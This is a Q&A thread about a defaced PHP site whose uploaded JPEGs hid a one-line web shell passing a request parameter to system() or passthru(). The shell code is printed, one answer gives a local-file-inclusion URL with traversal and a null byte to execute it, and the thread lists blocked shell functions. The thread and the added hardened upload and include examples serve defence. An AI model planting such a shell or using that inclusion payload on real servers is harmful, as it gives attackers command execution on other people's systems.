Yesterday my site was compromised. The attacker changed the index.php file to their own (with all their glory messages and greetings). I've notified the hosting company about this (we are running on a dedicated server), and on my part, I'm trying to fix anything that seems to be the cause, because I'm still unable to pinpoint how exactly our server was attacked, but I think I've found certain script-based loopholes that could possibly be the culprit.

Our site has an image uploader form, but all uploaded images are verified to be real image files and not code by using the PHP getimagesize function. Only if the image type is IMAGETYPE_GIF, IMAGETYPE_JPEG, or IMAGETYPE_PNG will they be accepted. Otherwise, the file won't be uploaded. However, I found out that one uploaded image file contains a PHP script inside it! You can download the image here. It's a valid image file, but try opening the image in any text editor and you will find PHP code inside it:

<?php

echo "<pre>"; system($_GET['cmd']); echo "</pre>";

?>

For example, the image is uploaded to this location (www.mysite.com/uploads/picodes.jpg). Take note that the uploads folder's permission is 755. Is there any way in the world the attacker can execute system (or any other command such as passthru, since we found that another image has the same code hidden inside as above, but with passthru instead of system) by just, for example, typing www.mysite.com/uploads/picodes.jpg?cmd=some command? From my knowledge it can't be done (I'd really appreciate it if someone can prove me wrong), unless the attacker can rename the jpg file to php, and even then, these codes are hidden deep inside the image (please see the image inside a text editor to understand what I'm trying to say).

As a precaution, I've disabled these PHP functions (exec, passthru, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, system) by adding them to disable_functions in php.ini.

Anyway, I still think that the attacker gained access not through the web, but through a server exploit, but I think my hosting company thinks otherwise.

AstroCB
imin
  • Depending on your server's configuration, if your image verifier doesn't check filenames, it might be possible for this to be exploited, e.g. if the attacker uploads the file with a name that has a `.php` extension. But that's really a question for Server Fault. Is that what you wanted to know? – David Z Aug 17 '10 at 03:55
  • Thanks for replying David, but as I've mentioned above, all uploaded files are checked first; only if they are image files (gif, jpg, or png) will they be accepted. Otherwise they will be discarded. So uploading a file with a .php extension or any other raw code with any extension will surely fail. – imin Aug 17 '10 at 03:59
  • Well, you said you use `getimagesize` to verify that the image is an image, but that function _does not check the file extension_. It only looks at the content of the file. (Try it: rename `picodes.jpg` to `picodes.php` and see what `getimagesize("picodes.php")` gives you.) So you need to also explicitly check the name under which the file is being uploaded, and make sure that it matches the image type returned by `getimagesize`. – David Z Aug 17 '10 at 04:52
  • OMG... how can I forget such a thing??!! Thanks a lot David! – imin Aug 17 '10 at 05:03
  • `php_admin_flag engine off` for all directories/locations you store uploads in should be part of your Apache config. – derobert Sep 27 '11 at 21:30
  • http://stackoverflow.com/questions/13250471/gif-jpeg-file-containing-php-code – Feb 21 '14 at 07:31

4 Answers

An image file with arbitrary PHP code can't be exploited with a direct request to it, e.g. http://www.mysite.com/uploads/image.jpg?cmd=somecode.

Still, it can be used with a Local File Inclusion vulnerability.

For example, if in index.php you use include('pages/' . $_GET['page'] . '.php');, then an attacker can upload an image with PHP code inside and execute commands with something like this: http://www.mysite.com/index.php?page=../upload/image.jpg?cmd=somecode%00

UPD: changed file in URL to page

p0deje
  • Well, then it should be `page` and not `file` in the url ;) – Shikiryu Oct 19 '10 at 08:40
  • Check http://stackoverflow.com/questions/13272231/how-to-safely-prevent-uploaded-file-from-being-run-via-php-on-any-server for other usages on misconfigured Windows servers. – regilero Jan 07 '13 at 14:00
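The include() pattern from the answer above beside a hardened form, as an added example that is not part of the original answer: `$_GET['page']` and the `pages/` directory are the answer's own names, the allowlist contents are constructed, and PHP 7.1+ is assumed.

```php
<?php
// Added example (not from the original answer). The null byte in the answer's
// URL works because, before PHP 5.3.4, a "\0" inside an include path cut the
// string off, so the appended ".php" was dropped and the uploaded image got
// included and executed. The fix below does not rely on that bug being patched.

// Pattern as described in the answer: the attacker controls part of the path.
function include_page_vulnerable(string $page): void
{
    include('pages/' . $page . '.php');
}

// Hardened form: map the request parameter to a fixed set of known pages and
// reject everything else, so no user-supplied byte ever reaches a filesystem path.
const ALLOWED_PAGES = ['home', 'about', 'contact'];   // constructed allowlist

function resolve_page(string $page): ?string
{
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    return __DIR__ . '/pages/' . $page . '.php';
}

function include_page_hardened(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// Constructed requests showing the difference:
var_dump(resolve_page('home'));                     // string: .../pages/home.php
var_dump(resolve_page("../uploads/image.jpg\0"));   // NULL: rejected before any include
```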

JPEG files can contain arbitrary data in them in addition to the actual image data; it's part of the spec. Thus, merely checking if an image is a valid JPEG does not mean that the file is necessarily completely harmless.

Amber
  • So how do I check if the jpg file is really harmless? Can other image formats (png and gif) contain arbitrary data too? And like my question above, even if they manage to upload an image file with code in it, how are they going to execute it without somehow renaming the file to php? – imin Aug 17 '10 at 04:17
  • There's not really a 100% way to make sure any file is harmless, it's more that you have to eliminate ways to potentially execute files (which I can't really give you as much help on, especially not knowing the details of the server setup). – Amber Aug 17 '10 at 04:23
  • Hmm, thanks a lot... guess I'll have to convert any uploaded image to another type (e.g. if jpg then convert it to gif, gif to jpg, png to jpg) to remove any code embedded inside it, if any. Anyway, is no one going to answer me on how they are going to execute the code inside it without renaming the image file to php? – imin Aug 17 '10 at 04:28
  • @imin: as Amber and I both hinted in comments, we'd need to know the details of your server setup to answer that question. – David Z Aug 17 '10 at 04:54
  • Not sure how to answer this question since our provider sets everything up (and we trust them to do it well). Anyway, basically we are running PHP Version 5.3.1, Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28 mod_perl/2.0.4 Perl/v5.8.8 Server at www.trymasak.my Port 80 (all taken from phpinfo()) – imin Aug 17 '10 at 05:06
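A small JPEG segment walker that shows where the "arbitrary data" from the answer above actually lives, as an added example (not code from the original answer); the sample JPEG at the bottom is constructed inline and PHP 7+ is assumed.

```php
<?php
// Added example. JPEG is a chain of FF xx marker segments: COM (FF FE) and
// APPn (FF E0..EF) carry free-form bytes, and decoders ignore everything after
// EOI (FF D9), so text like the PHP in picodes.jpg can sit there in a valid file.
function jpeg_suspicious_segments(string $data): array
{
    $findings = [];
    $len = strlen($data);
    if ($len < 4 || substr($data, 0, 2) !== "\xFF\xD8") {
        return ['not a JPEG: no SOI marker'];
    }
    $pos = 2;
    while ($pos + 2 <= $len) {
        if (ord($data[$pos]) !== 0xFF) {
            $findings[] = sprintf('unexpected byte 0x%02X at offset %d', ord($data[$pos]), $pos);
            return $findings;
        }
        $marker = ord($data[$pos + 1]);
        if ($marker === 0xFF) { $pos++; continue; }            // fill byte before a marker
        if ($marker === 0xD9) {                                // EOI: anything after it is a trailer
            $trailer = substr($data, $pos + 2);
            if ($trailer !== '') {
                $findings[] = sprintf('%d bytes after EOI%s', strlen($trailer),
                    stripos($trailer, '<?') !== false ? ' containing "<?"' : '');
            }
            return $findings;
        }
        if ($marker === 0xDA) {                                // SOS: skip entropy-coded data
            $eoi = strpos($data, "\xFF\xD9", $pos);
            if ($eoi === false) { $findings[] = 'no EOI marker'; return $findings; }
            $pos = $eoi;
            continue;
        }
        if ($pos + 4 > $len) { $findings[] = 'truncated segment header'; return $findings; }
        $segLen = unpack('n', substr($data, $pos + 2, 2))[1];  // length includes its own 2 bytes
        if ($segLen < 2) { $findings[] = 'bad segment length'; return $findings; }
        $payload = substr($data, $pos + 4, $segLen - 2);
        $freeForm = $marker === 0xFE || ($marker >= 0xE0 && $marker <= 0xEF);
        if ($freeForm && stripos($payload, '<?') !== false) {
            $findings[] = sprintf('segment 0xFF%02X at offset %d contains "<?"', $marker, $pos);
        }
        $pos += 2 + $segLen;
    }
    return $findings;
}

// Constructed sample: SOI, one COM segment carrying a PHP open tag, then EOI.
$comment = "<?php echo 'hello'; ?>";
$sample  = "\xFF\xD8\xFF\xFE" . pack('n', strlen($comment) + 2) . $comment . "\xFF\xD9";
print_r(jpeg_suspicious_segments($sample));   // reports the COM segment at offset 2
```

PNG and GIF have equivalent free-form areas (PNG tEXt/zTXt chunks, GIF comment extensions, and trailing bytes in both), so a scanner like this is a triage aid, not proof that a file is harmless.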

My image file uploader settings are: upload the file to a temp folder, create a new image using imagecreatefromjpeg or imagecreatefrompng or imagecreatefromgif and save it, then delete the uploaded file from the temp folder (all of this happens within the same script action, so the file uploaded to the temp folder does not exist for long).

user424821
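An upload handler combining the checks raised on this page, the asker's getimagesize() type check, David Z's extension-matches-content check, and the GD re-encoding described in the answer above, as an added example that is neither the asker's nor the answerer's code. It assumes PHP 7+ with the GD extension, `$upload` is one `$_FILES` entry, and `$destDir` is a directory where PHP execution is off (derobert's `php_admin_flag engine off`) or outside the web root.

```php
<?php
// Added example (not the page's own code). Order matters: getimagesize() only
// reads the header, so a JPEG with PHP in a comment segment passes it; the GD
// re-encode at the end is what guarantees only pixel data reaches $destDir.
function store_image_safely(array $upload, string $destDir): ?string
{
    if ($upload['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($upload['tmp_name'])) {
        return null;
    }
    $info = @getimagesize($upload['tmp_name']);
    if ($info === false) {
        return null;                 // not an image at all
    }
    // Extension must agree with the detected content type (David Z's point).
    $ext = strtolower(pathinfo($upload['name'], PATHINFO_EXTENSION));
    $types = [
        IMAGETYPE_GIF  => ['gif'],
        IMAGETYPE_JPEG => ['jpg', 'jpeg'],
        IMAGETYPE_PNG  => ['png'],
    ];
    if (!isset($types[$info[2]]) || !in_array($ext, $types[$info[2]], true)) {
        return null;                 // type not allowed, or name disagrees with content
    }
    // Decode the pixels with GD; a file that does not decode is rejected.
    switch ($info[2]) {
        case IMAGETYPE_GIF:  $img = @imagecreatefromgif($upload['tmp_name']);  break;
        case IMAGETYPE_JPEG: $img = @imagecreatefromjpeg($upload['tmp_name']); break;
        default:             $img = @imagecreatefrompng($upload['tmp_name']);  break;
    }
    if ($img === false) {
        return null;
    }
    // Server-chosen name: the client's filename never becomes part of the path.
    $dest = $destDir . '/' . bin2hex(random_bytes(16)) . '.' . $types[$info[2]][0];
    $ok = $info[2] === IMAGETYPE_JPEG ? imagejpeg($img, $dest, 90)
        : ($info[2] === IMAGETYPE_PNG ? imagepng($img, $dest) : imagegif($img, $dest));
    imagedestroy($img);
    return $ok ? $dest : null;       // path of the freshly written file, or null
}
```

Re-encoding drops EXIF metadata and GIF animation along with any embedded payload, which is usually the right trade for user uploads; the temp file PHP created is removed automatically at the end of the request.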

This may not be a vulnerability in your code. I had the same thing happen to me a few weeks ago. Although ALL my index.php files were removed, even ones not directly web accessible. In my case, it was a security hole in Linux. Not anything to do with my code. This was the reply from my hosting provider (A2Hosting), regarding the problem. Once I convinced them it wasn't anything I did, they figure things out pretty quickly.

"A recent exploit in the Linux kernel was used to grant administrative (root) access to users' directories on the server. The attack consisted of removing index files found in directories and replacing them with the attacker's desired content: A black web page with the attacker's code name, "iSKORPiTX (Turkish Hacker)". This hack was massive across the internet and used a previously unknown vulnerability, limiting our ability in preventing it."

Brent Baisley